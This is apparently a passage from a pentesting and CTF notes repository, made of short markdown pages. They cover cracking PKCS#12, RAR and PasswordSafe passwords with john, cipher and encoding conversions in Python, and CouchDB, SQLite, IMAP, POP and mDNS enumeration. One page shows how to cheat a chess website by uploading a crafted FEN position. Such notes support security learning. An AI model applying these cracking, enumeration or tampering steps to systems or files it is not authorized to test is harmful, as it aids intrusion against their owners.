26 | 27 | ## Decode Public Key 28 | 29 | There are some online tools. 30 | 31 | - **[PGPDump](https://8gwifi.org/pgpdump.jsp)** -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/pkcs.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: PKCS (Public-Key Cryptography Standards) 3 | description: PKCS are a group of public-key cryptography standards. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2022-12-01 8 | draft: false 9 | --- 10 | 11 | ## Decrypt 12 | 13 | ### PKCS#12 14 | 15 | First of all, you need to format the PKCS file so that John can recognize it. 16 | 17 | ```sh 18 | pfx2john example.pfx > hash.txt 19 | ``` 20 | 21 | Crack the password using the formatted text. 22 | 23 | ```sh 24 | john --wordlist=wordlist.txt hash.txt 25 | ``` 26 | -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/rar.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: RAR (Roshal Archive) 3 | description: RAR is a proprietary archive file format that supports data compression, error correction and file spanning. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2022-12-22 8 | draft: false 9 | --- 10 | 11 | ## Decrypt 12 | 13 | First of all, you need to format the RAR file so that John can recognize it. 14 | 15 | ```sh 16 | rar2john example.rar > hash.txt 17 | ``` 18 | 19 | Crack the password using the formatted text. 20 | 21 | ```sh 22 | john --wordlist=wordlist.txt hash.txt 23 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/ripemd.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: RIPEMD 3 | description: RIPEMD (RIPE Message Digest) is a family of cryptographic hash functions developed in 1992.
4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-03-07 8 | draft: false 9 | --- 10 | 11 | ## Decrypt 12 | 13 | There are many online tools for computing RIPEMD digests or looking up known RIPEMD hashes. Note that RIPEMD is a hash function, so a hash cannot be "decrypted"; it can only be matched against precomputed values. For example, 14 | 15 | - [https://gchq.github.io/CyberChef/#recipe=RIPEMD('320')](https://gchq.github.io/CyberChef/#recipe=RIPEMD('320')) 16 | - [https://md5hashing.net/hash/ripemd160](https://md5hashing.net/hash/ripemd160) 17 | 18 | -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/rot13-rot47.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: ROT13, ROT47 3 | description: ROT13 (rotate by 13 places), ROT47 (rotate by 47 places) are simple letter substitution ciphers. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2022-12-22 8 | draft: false 9 | --- 10 | 11 | ## Decode 12 | 13 | **[CyberChef](https://gchq.github.io/CyberChef/)** is a useful online tool to decode ROT13 and ROT47. 14 | 15 |
16 | 17 | ## Encode 18 | 19 | ### ROT13 20 | 21 | ```sh 22 | echo hello | tr 'A-Za-z' 'N-ZA-Mn-za-m' 23 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/transposition-cipher.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Transposition Cipher 3 | description: Transposition Cipher is a method of encryption which scrambles the positions of characters without changing the characters themselves. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-02-21 8 | draft: false 9 | --- 10 | 11 | ## Decode 12 | 13 | - **[Online Decoder](https://www.dcode.fr/transposition-cipher)** -------------------------------------------------------------------------------- /src/exploit/cryptography/algorithm/vigenere-cipher.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Vigenere Cipher 3 | description: Vigenere Cipher is a method of encrypting alphabetic text by using a series of interwoven Caesar ciphers, based on the letters of a keyword. 
4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-03-28 8 | draft: false 9 | --- 10 | 11 | ## Online Tools 12 | 13 | - **[CyberChef](https://gchq.github.io/CyberChef/#recipe=Vigen%C3%A8re_Decode(''))** 14 | - **[Vigenere Cipher Encoder/Decoder](https://www.dcode.fr/vigenere-cipher)** 15 | - **[Vigenere Solver](https://www.guballa.de/vigenere-solver)** 16 | 17 | -------------------------------------------------------------------------------- /src/exploit/cryptography/bit-wise-operation/_data.yml: -------------------------------------------------------------------------------- 1 | category2: bit-wise-operation -------------------------------------------------------------------------------- /src/exploit/cryptography/bit-wise-operation/and-bitwise-operations.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: AND Bitwise Operations 3 | description: 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Basic 12 | 13 | We can do the **AND** operations using **`&`** operator. 14 | 15 | ```python 16 | 24 & 72 17 | 0x18 & 0x48 18 | # 8 19 | 20 | # Binary representation 21 | bin(24 & 72) 22 | # '0b1000' 23 | ``` 24 | -------------------------------------------------------------------------------- /src/exploit/cryptography/bit-wise-operation/or-bitwise-operations.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: OR Bitwise Operations 3 | description: 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Basic 12 | 13 | Assume we want to **OR** operation **0100** and **1001**. 14 | 15 | ```python 16 | 0100 17 | # OR 18 | 1001 19 | 20 | # Result: 1101 21 | ``` 22 | 23 | We can do that using **`|`** operator in Python. 
24 | 25 | ```python 26 | 0b0100 | 0b1001 27 | # 13 ('1101' in binary) 28 | 29 | 4 | 9 30 | # 13 ('1101' in binary) 31 | 32 | # Binary representation 33 | bin(0b0100 | 0b1001) 34 | # 0b1101 35 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/bit-wise-operation/shift-bitwise-operations.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Shift Bitwise Operations 3 | description: 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Basic 12 | 13 | ### Left Bit Shift 14 | 15 | Assume we want to shift the binary value **`0100`** one bit to the left, as below. 16 | 17 | ```txt 18 | 0100 -> 1000 19 | ``` 20 | 21 | We can achieve this using the **`<<`** operator in Python. 22 | 23 | ```python 24 | 0b100 << 1 25 | # 8 ('1000' in binary) 26 | 27 | 4 << 1 28 | # 8 ('1000' in binary) 29 | 30 | # Output as the binary representation 31 | bin(4 << 1) 32 | # 0b1000 33 | ``` 34 | 35 | ### Right Bit Shift 36 | 37 | Assume we want to shift the binary value **`0100`** one bit to the right, as below. 38 | 39 | ```txt 40 | 0100 -> 0010 41 | ``` 42 | 43 | We can achieve this using the **`>>`** operator in Python. 44 | 45 | ```python 46 | 0b100 >> 1 47 | # 2 ('10' in binary) 48 | 49 | 4 >> 1 50 | # 2 ('10' in binary) 51 | 52 | bin(4 >> 1) 53 | # 0b10 54 | ``` 55 | -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/_data.yml: -------------------------------------------------------------------------------- 1 | category2: conversion -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-bytes-to-hex-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert Bytes to Hex in Python 3 | description: Converting bytes to hex is easily done by hex method in python. 
4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | Using **`hex`** method in Python, we can easily convert bytes to hex. 14 | 15 | ```python 16 | b'Hello World'.hex() 17 | # 48656c6c6f20576f726c64 18 | 19 | b'abcdef'.hex() 20 | # 616263646566 21 | 22 | b'\xe3\x81\xad\xe3\x81\x93'.hex() 23 | # e381ade38193 24 | ``` 25 | 26 | By the way, for converting from string to bytes before converting bytes to hex, use **`encode`** method as below. 27 | 28 | ```python 29 | 'Hello World'.encode().hex() 30 | # 48656c6c6f20576f726c64 31 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-bytes-to-int-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert Bytes to Int in Python 3 | description: Converting bytes to int is easily done by int.from_bytes method in python. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | ### Big Endian 14 | 15 | For using big endian, we can specify **"big"** to the **byteorder** argument (**the second argument**) of **int.from_bytes** method in Python. 16 | 17 | ```python 18 | int.from_bytes(b'hello', byteorder='big') 19 | # 448378203247 20 | 21 | int.from_bytes(b'\x00\x01', byteorder='big') 22 | # 1 23 | ``` 24 | 25 | ### Little Endian 26 | 27 | For using little endian, we can specify **"little"** to the **byteorder** argument (**the second argument**) of **int.from_bytes** method in Python. 
28 | 29 | ```python 30 | int.from_bytes(b'hello', byteorder='little') 31 | # 478560413032 32 | 33 | int.from_bytes(b'\x00\x01', byteorder='little') 34 | # 256 35 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-bytes-to-string-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert Bytes to String in Python 3 | description: We can decode bytes to string in Python. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | Using **`decode`** method in Python, we can easily convert **bytes** to **string**. 14 | There are three types of **`decode`** methods as below. 15 | 16 | All of the results say **"Hello"**. 17 | 18 | ```python 19 | b'Hello'.decode('utf-8') 20 | 21 | bytes.decode(b'Hello', 'utf-8') 22 | 23 | codecs.decode(b'Hello', 'utf-8') 24 | ``` 25 | -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-character-to-binary-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert Character to Binary in Python 3 | description: We can convert a character to binary using the format method in Python. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | ### Character -> N-bit 14 | 15 | Using **`format`** method, the given character is converted to bits. 16 | 17 | ```python 18 | char = 'a' 19 | format(ord(char), 'b') 20 | # 1100001 21 | ``` 22 | 23 | ### Character -> 8-bit 24 | 25 | We can specify **8-bit** representation by prepending **`{0:08b}`** before the **`format`** method. 
26 | 27 | ```python 28 | char = 'a' 29 | '{0:08b}'.format(ord(char), 'b') 30 | # 01100001 31 | ``` 32 | 33 | ### Character -> 16-bit 34 | 35 | We can specify **16-bit** representation by prepending **`{0:016b}`** before the **`format`** method. 36 | 37 | ```python 38 | char = 'a' 39 | '{0:016b}'.format(ord(char), 'b') 40 | # 0000000001100001 41 | ``` 42 | -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-character-to-unicode-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert Character to Unicode in Python 3 | description: We can easily convert a character to Unicode using the ord method in Python. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | We can use **`ord`** method in Python to convert a **character** to **Unicode**. 14 | 15 | ```python 16 | ord('a') 17 | # 97 18 | ``` 19 | 20 | By the way, use **`chr`** method to convert **Unicode** to a **character**. 21 | 22 | ```python 23 | chr(97) 24 | # a 25 | ``` 26 | -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-hex-to-bytes-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert Hex to Bytes in Python 3 | description: 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-09-04 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | Using **`bytes.fromhex`** method, we can convert **hex string** to **bytes string**. 
14 | 15 | ```python 16 | hex_str = "48656c6c6f20576f726c64" 17 | 18 | bytes.fromhex(hex_str) 19 | # b'Hello World' 20 | ``` 21 | -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-int-to-binary-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert Int to Binary in Python 3 | description: Using the format method in Python, we can convert int to binary. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | ### Int -> N-bit 14 | 15 | Specify **'b'** in the **`format`** method in Python. 16 | 17 | ```python 18 | format(123, 'b') 19 | 20 | # 1111011 21 | ``` 22 | 23 | ### Int -> 8-bit 24 | 25 | We can get a zero-padded **`8-bit`** representation by using the format string **`{0:08b}`** with the **`format`** method. 26 | Alternatively, the **`zfill`** method can be used for this purpose. 27 | 28 | ```python 29 | '{0:08b}'.format(123, 'b') 30 | format(123, 'b').zfill(8) 31 | 32 | # 01111011 33 | ``` 34 | 35 | ### Int -> 16-bit 36 | 37 | In the same way, we can get a **`16-bit`** representation with the format string **`{0:016b}`**, or with the **`zfill`** method. 38 | 39 | ```python 40 | '{0:016b}'.format(123, 'b') 41 | format(123, 'b').zfill(16) 42 | 43 | # 0000000001111011 44 | ``` 45 | -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-int-to-bytes-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert Int to Bytes in Python 3 | description: 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | Using the **`to_bytes`** built-in method in Python, we can convert an int to bytes. 14 | In addition, we can specify the length (in bytes) as the first argument of the **`to_bytes`** method. 
15 | 16 | ### Big Endian 17 | 18 | By specifying **'big'** for the **`byteorder`** argument, the result is in **big endian** byte order. 19 | 20 | ```python 21 | num = 1234 22 | 23 | num.to_bytes(2, byteorder='big') 24 | # b'\x04\xd2' 25 | 26 | num.to_bytes(3, byteorder='big') 27 | # b'\x00\x04\xd2' 28 | 29 | num.to_bytes(4, byteorder='big') 30 | # b'\x00\x00\x04\xd2' 31 | ``` 32 | 33 | ### Little Endian 34 | 35 | By specifying **'little'** for the **`byteorder`** argument, the result is in **little endian** byte order. 36 | 37 | ```python 38 | num = 1234 39 | 40 | num.to_bytes(2, byteorder='little') 41 | # b'\xd2\x04' 42 | 43 | num.to_bytes(3, byteorder='little') 44 | # b'\xd2\x04\x00' 45 | 46 | num.to_bytes(4, byteorder='little') 47 | # b'\xd2\x04\x00\x00' 48 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-int-to-hex-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert Int to Hex in Python 3 | description: 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | We can convert int to hex using the **`hex`** method in Python. 14 | 15 | ```python 16 | hex(123) 17 | # 0x7b 18 | 19 | hex(448378203247) 20 | # 0x68656c6c6f 21 | ``` 22 | 23 | To remove the prefix **`0x`**, exclude the first two characters from the string with **`[2:]`**. 
24 | 25 | ```python 26 | hex(123)[2:] 27 | # 7b 28 | 29 | hex(448378203247)[2:] 30 | # 68656c6c6f 31 | ``` 32 | -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-string-to-binary-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert String to Binary in Python 3 | description: 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | For converting strings to binary, we need to convert each character to binary by first converting the character to Unicode. 14 | Then concatenate these binaries. 15 | 16 | ```python 17 | text = "Hello" 18 | 19 | bin_str = "" 20 | for c in text: 21 | c_bin = bin(ord(c))[2:] # remove "0b" prefix 22 | bin_str += c_bin.zfill(8) # padding to 8-bit for adjustment 23 | 24 | print(bin_str) 25 | # 0100100001100101011011000110110001101111 26 | ``` 27 | -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-string-to-bytes-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert String to Bytes in Python 3 | description: We can encode strings to bytes using Python's built-in methods. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | We can use several ways to encode string to bytes in Python. 14 | 15 | - **string** class has **`encode`** method to encode strings to bytes. 16 | - **bytes** method converts string to bytes. 17 | 18 | Also we can specify the format e.g. **`utf-8`**, **`shift_jis`** as argument. 
19 | 20 | ```python 21 | # Using encode() method 22 | "Hello".encode('utf-8') 23 | "Hello".encode('shift_jis') 24 | 25 | # Using bytes() method 26 | bytes("Hello", 'utf-8') 27 | bytes("Hello", 'shift_jis') 28 | 29 | # Result: b'Hello' 30 | ``` 31 | 32 | ### Decode Bytes to String 33 | 34 | By the way, we can decode bytes to string with **`decode`** method. 35 | 36 | ```python 37 | b"Hello".decode() 38 | # Hello 39 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/conversion/convert-unicode-to-character-in-python.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Convert Unicode to Character in Python 3 | description: We can easily convert Unicode to character using the chr method in Python. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2023-08-29 8 | draft: false 9 | --- 10 | 11 | ## Conversion 12 | 13 | Using **`chr`** method in Python, we can convert Unicode to a character as below. 14 | 15 | ```python 16 | chr(97) 17 | # a 18 | 19 | chr(98) 20 | # b 21 | ``` 22 | 23 | By the way, use **`ord`** method to convert **character** to a **Unicode**. 24 | 25 | ```python 26 | ord('a') 27 | # 97 28 | ``` 29 | -------------------------------------------------------------------------------- /src/exploit/cryptography/key-derivation-function/_data.yml: -------------------------------------------------------------------------------- 1 | category2: key-derivation-function -------------------------------------------------------------------------------- /src/exploit/cryptography/key-derivation-function/scrypt.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Scrypt 3 | description: Scrypt is a password-based key derivation function. 
4 | tags: 5 | - Cryptography 6 | - Key Derivation Function 7 | refs: 8 | - https://pycryptodome.readthedocs.io/en/latest/src/protocol/kdf.html#scrypt 9 | date: 2023-08-06 10 | draft: false 11 | --- 12 | 13 | ## Using Scrypt in Python 14 | 15 | We can use scrypt easily thanks of Pycryptodome. 16 | We need to install it first. 17 | 18 | ```python 19 | pip install pycryptodome 20 | ``` 21 | 22 | Below is a Python script to derive a key from a password with scrypt. 23 | 24 | ```python 25 | from Crypto.Protocol.KDF import scrypt 26 | from Crypto.Random import get_random_bytes 27 | 28 | password = b'secret' 29 | salt = get_random_bytes(16) 30 | key = scrypt(password, salt, 16, N=2**14, r=8, p=1) 31 | print(f"key: {key.hex()}") 32 | ``` 33 | -------------------------------------------------------------------------------- /src/exploit/cryptography/math/_data.yml: -------------------------------------------------------------------------------- 1 | category2: math -------------------------------------------------------------------------------- /src/exploit/cryptography/math/exponential.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Exponentiation 3 | description: 4 | tags: 5 | - Cryptography 6 | - Math 7 | refs: 8 | - https://en.wikipedia.org/wiki/Exponentiation 9 | date: 2023-09-07 10 | draft: false 11 | --- 12 | 13 | ## Basic 14 | 15 | We can calculate the exponentiation using **'\*\*'** operator in Python. 16 | 17 | ```python 18 | 2 ** 4 19 | # 16 20 | 21 | 6 ** 8 22 | # 1679616 23 | ``` 24 | 25 |
26 | 27 | ## Using Pow Method in Python 28 | 29 | The **`pow`** method can be used for the exponentiation. 30 | 31 | ```python 32 | pow(2, 4) 33 | # 2 ** 4 = 16 34 | ``` 35 | 36 | ### Modular Exponentiation 37 | 38 | In addition, by passing a third argument, we can find the remainder of the raised value divided by that modulus (modular exponentiation). 39 | This is sometimes used to find the secret key in **key derivation functions**, etc. 40 | 41 | ```python 42 | pow(2, 4, 6) 43 | # 2 ** 4 % 6 = 4 44 | ``` 45 | 46 |
47 | 48 | ## Inverse 49 | 50 | ```python 51 | from Crypto.Util.number import inverse 52 | 53 | inverse(3, 10) # 7 54 | pow(3, -1, 10) # 7 55 | ``` -------------------------------------------------------------------------------- /src/exploit/cryptography/math/modular-congruence.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Modular Congruence 3 | description: 4 | tags: 5 | - Cryptography 6 | - Math 7 | - Modular Arithmetic 8 | refs: 9 | - https://cryptohack.org/courses/modular/ma0/ 10 | date: 2023-09-02 11 | draft: false 12 | --- 13 | 14 | ## Basic 15 | 16 | In modular congruence, the following rules apply: 17 | 18 | ```txt 19 | If `a ≡ b mod c`, then `b ≡ a mod c` 20 | ``` 21 | 22 | So if we have the following problem, 23 | 24 | ```python 25 | 39 ≡ x mod 8 26 | ``` 27 | 28 | To find the smallest non-negative **`x`**, we can compute it as below using Python. 29 | 30 | ```python 31 | x = 39 % 8 32 | print(x) 33 | ``` 34 | -------------------------------------------------------------------------------- /src/exploit/cryptography/math/quadratic-residue.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Quadratic Residue 3 | description: 4 | tags: 5 | - Cryptography 6 | - Math 7 | - Modular Arithmetic 8 | refs: 9 | - https://cryptohack.org/courses/modular/root1/ 10 | date: 2023-09-02 11 | draft: false 12 | --- 13 | 14 | ## Basic 15 | 16 | An integer **`x`** is called a quadratic residue modulo **`p`** if there exists an integer **`a`** such that: 17 | 18 | ```python 19 | a**2 = x mod p 20 | ``` 21 | 22 | ### Brute Force 23 | 24 | To enumerate the quadratic residues modulo **`p`**, the following Python script is an example. 
25 | 26 | ```python 27 | p = 71 28 | 29 | for a in range(p): 30 | qr = (pow(a, 2, p)) 31 | print(f"a={a} : qr={qr}") 32 | ``` 33 | 34 | ### Legendre Symbol 35 | 36 | According to the Legendre symbol (for an odd prime **`p`**), the following rules hold: 37 | 38 | ```python 39 | # `a` is a quadratic residue and `a != 0 mod p` 40 | a**(p-1)/2 mod p == 1 41 | 42 | # `a` is a quadratic non-residue mod p 43 | a**(p-1)/2 mod p == -1 44 | 45 | # `a ≡ 0 mod p` 46 | a**(p-1)/2 mod p == 0 47 | ``` 48 | 49 | We can check whether an integer is a quadratic residue or not by referring to the above. 50 | 51 | ```python 52 | print(pow(a, (p-1)//2, p) == 1) 53 | # If True, `a` is a quadratic residue. 54 | ``` 55 | -------------------------------------------------------------------------------- /src/exploit/cryptography/tool/_data.yml: -------------------------------------------------------------------------------- 1 | category2: tool -------------------------------------------------------------------------------- /src/exploit/cryptography/tool/password-safe-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Password Safe Pentesting 3 | description: Password Safe is a password database utility. We may retrieve passwords for users. 4 | tags: 5 | - Cryptography 6 | refs: 7 | date: 2025-03-13 8 | draft: false 9 | --- 10 | 11 | ## Install PasswordSafe Manager 12 | 13 | Go to the [release page](https://github.com/pwsafe/pwsafe/releases) and download it. 
14 | 15 | For example, if you use Debian, download the `.deb` package and run the following command: 16 | 17 | ```bash 18 | sudo dpkg -i passwordsafe-debian12-x.x-amd64.deb 19 | ``` 20 | 21 | ## Analyze `.pwsafe3` file 22 | 23 | ```bash 24 | pwsafe example.pwsafe3 25 | ``` 26 | 27 | ## Crack `.pwsafe` Password 28 | 29 | If a password is required to open the `.pwsafe` file in the PasswordSafe manager, we might be able to crack the password of the `.pwsafe` file as below: 30 | 31 | ```bash 32 | pwsafe2john example.pwsafe3 > hash.txt 33 | john --wordlist=wordlist.txt hash.txt 34 | ``` 35 | -------------------------------------------------------------------------------- /src/exploit/database/_data.yml: -------------------------------------------------------------------------------- 1 | category1: database 2 | related_menus: 3 | - title: Database 4 | id: others -------------------------------------------------------------------------------- /src/exploit/database/couchdb-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: CouchDB Pentesting 3 | description: Apache CouchDb is a document-oriented NoSQL database. Default ports are 5984, 6984. 4 | tags: 5 | - Database 6 | refs: 7 | - https://guide.couchdb.org/draft/tour.html 8 | date: 2022-12-28 9 | draft: false 10 | --- 11 | 12 | ## Directories 13 | 14 | ```sh 15 | # List all databases 16 | /_all_dbs 17 | 18 | # Show information of the database 19 | /<db_name> 20 | 21 | # Futon administration interface 22 | /_utils/ 23 | # Temporary View 24 | /_utils/database.html?/_temp_view 25 | ``` 26 | 27 |
28 | 29 | ## Basic Operations 30 | 31 | ```sh 32 | # Create a new database 33 | curl -X PUT https://example.com:5984/ 34 | 35 | # Delete a database 36 | curl -X DELETE https://example.com:5984/ 37 | ``` -------------------------------------------------------------------------------- /src/exploit/database/sqlite-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: SQLite Pentesting 3 | description: SQLite is a database engine. 4 | tags: 5 | - Database 6 | refs: 7 | date: 2024-10-03 8 | draft: false 9 | --- 10 | 11 | ## Interpreter 12 | 13 | ```sh 14 | sqlite3 sample.db 15 | sqlite3 sample.sqlite 16 | sqlitebrowser sample.db 17 | ``` 18 | 19 |
20 | 21 | ## Commands 22 | 23 | ```sh 24 | # Help 25 | sqlite> .help 26 | 27 | # Show databases 28 | sqlite> .databases 29 | 30 | # Show tables 31 | sqlite> .tables 32 | 33 | # Show table information 34 | sqlite> PRAGMA table_info(table_name); 35 | 36 | # Dump contents of tables 37 | sqlite> .dump 38 | 39 | # SQL commands to display values in the table 40 | sqlite> SELECT * FROM <table_name>; 41 | # Display values in Hex 42 | sqlite> SELECT HEX(column_name) FROM <table_name>; 43 | 44 | # Exit the interpreter 45 | sqlite> .quit 46 | ``` -------------------------------------------------------------------------------- /src/exploit/dns/_data.yml: -------------------------------------------------------------------------------- 1 | category1: dns 2 | related_menus: 3 | - title: Others 4 | id: others -------------------------------------------------------------------------------- /src/exploit/dns/multicast-dns-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: mDNS (Multicast DNS) Pentesting 3 | description: Multicast DNS protocol resolves hostnames to IP addresses within small networks that do not include a local name server. It is a zero-configuration (zeroconf) service. It uses UDP. A default port is 5353. 4 | tags: 5 | - DNS 6 | refs: 7 | date: 2022-12-01 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```sh 14 | nmap -sU --script dns-service-discovery -p 5353 <target> 15 | ``` -------------------------------------------------------------------------------- /src/exploit/email/_data.yml: -------------------------------------------------------------------------------- 1 | category1: email 2 | related_menus: 3 | - title: Others 4 | id: others -------------------------------------------------------------------------------- /src/exploit/email/imap-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: IMAP (Internet Message Access Protocol) Pentesting 3 | description: IMAP is an internet standard protocol used by email clients. Default ports are 143, 993. 4 | tags: 5 | - Email 6 | refs: 7 | date: 2023-03-18 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```sh 14 | nmap --script imap-capabilities -p 143 <target> 15 | ``` 16 | 17 | ### Banner Grabbing 18 | 19 | ```sh 20 | nc -nv <target> 143 21 | openssl s_client -connect <target>:993 -quiet 22 | ``` 23 | 24 |
25 | 26 | ## Connect 27 | 28 | ```bash 29 | telnet 10.0.0.1 143 30 | ``` 31 | 32 |
33 | 34 | ## Commands 35 | 36 | ```bash 37 | # Login 38 | a1 login "" "" 39 | 40 | # Logout 41 | a1 logout 42 | 43 | # Close mailbox 44 | a1 close 45 | ``` -------------------------------------------------------------------------------- /src/exploit/email/pop-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: POP (Post Office Protocol) Pentesting 3 | description: Post Office Protocol is an application-layer protocol used by email clients. POP3 is a commonly used version. Default ports are 110, 995. 4 | tags: 5 | - Email 6 | refs: 7 | date: 2023-07-19 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```bash 14 | nmap --script "pop3-capabilities or pop3-ntlm-info" -p 110 15 | ``` 16 | 17 |
18 | 19 | ## Connect 20 | 21 | ```bash 22 | nc 110 23 | # or 24 | telnet 110 25 | ``` 26 | 27 |
28 | 29 | ## Commands 30 | 31 | ```bash 32 | # Login 33 | USER <username> 34 | PASS <password> 35 | 36 | # Number and total size of all messages 37 | STAT 38 | # List messages and size 39 | LIST 40 | # Retrieve the message of given number 41 | RETR <message_number> 42 | # Delete the message of given number 43 | DELE <message_number> 44 | # Reset the mailbox 45 | RSET 46 | # Exit the mail server 47 | QUIT 48 | ``` 49 | -------------------------------------------------------------------------------- /src/exploit/game/_data.yml: -------------------------------------------------------------------------------- 1 | category1: game 2 | related_menus: 3 | - title: Others 4 | id: others -------------------------------------------------------------------------------- /src/exploit/game/chess-game-cheating.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Chess Game Cheating 3 | description: 4 | tags: 5 | - Game 6 | draft: false 7 | --- 8 | 9 | ## FEN Manipulation 10 | 11 | Forsyth-Edwards Notation (FEN) is a standard notation for describing a particular position of a chess game. The file format is `.fen`. 12 | The [FEN Generator](http://www.netreal.de/Forsyth-Edwards-Notation/index.php) allows us to create a custom FEN string. 13 | For example, the strings below describe a position where all of our pieces except the king are queens, and all of the opponent's pieces except the king are pawns. 14 | 15 | ```bash 16 | pppkpppp/pppppppp/8/8/8/8/QQQQQQQQ/QQQQKQQQ 17 | # or 18 | ppppkppp/pppppppp/8/8/8/8/QQQQQQQQ/QQQQKQQQ w KQkq - 0 1 19 | ``` 20 | 21 | Then paste the FEN string into a `.fen` file. 22 | Alternatively, paste it into [pastebin](https://pastebin.com/) and click the “raw” button to get a URL to the raw text. 23 | This file (or URL) can then be used for uploading to, or manipulating, the target website. 
24 | -------------------------------------------------------------------------------- /src/exploit/game/minecraft-server-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Minecraft Server Pentesting 3 | description: A Minecraft server is a player-owned or business-owned multiplayer game server. A default port is 25565. 4 | tags: 5 | - Game 6 | refs: 7 | date: 2023-01-26 8 | draft: false 9 | --- 10 | 11 | ## Run a Server 12 | 13 | ```bash 14 | # Create the screen session 15 | screen -C 16 | 17 | # Reattach to the session 18 | screen -r 19 | ``` 20 | 21 |
